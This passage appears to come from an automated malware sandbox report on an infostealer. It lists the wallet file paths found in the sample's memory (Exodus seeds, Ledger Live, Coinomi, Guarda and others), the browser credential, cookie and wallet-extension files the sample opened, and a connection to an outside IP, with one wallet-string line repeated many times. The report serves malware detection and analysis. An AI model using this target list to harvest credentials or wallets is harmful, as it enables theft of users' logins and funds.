(Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Leaks process information
                          Source: global trafficTCP traffic: 192.168.2.5:49960 -> 185.121.15.192:80
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
